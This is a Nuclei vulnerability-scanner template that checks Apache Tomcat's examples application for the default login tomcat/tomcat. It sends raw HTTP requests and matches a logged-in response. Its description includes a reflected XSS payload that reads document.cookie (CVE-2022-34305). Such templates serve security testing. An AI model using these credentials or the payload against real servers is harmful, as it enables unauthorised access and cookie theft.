nuclei-templates/default-logins/apache/tomcat-examples-login.yaml

45 lines
1.1 KiB
YAML

id: tomcat-examples-login
info:
name: Tomcat Examples Default Login
author: 0xelkomy & C0NQR0R
severity: info
description: Default Creds and there is XSS here, /examples/jsp/security/protected/index.jsp?dataName=%22%3E%3Cimg+src%3Dd+onerror%3Dalert%28document.cookie%29%3E&dataValue= after you login you will be able to get it.
reference:
- https://c0nqr0r.github.io/CVE-2022-34305/
metadata:
verified: true
tags: default-login,tomcat
requests:
- raw:
- |
GET /examples/jsp/security/protected/index.jsp HTTP/1.1
Host: {{Hostname}}
- |
POST /examples/jsp/security/protected/j_security_check HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
j_username={{username}}&j_password={{password}}
attack: pitchfork
payloads:
username:
- tomcat
password:
- tomcat
redirects: true
max-redirects: 2
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "You are logged in as remote user"
- "{{username}}"
condition: and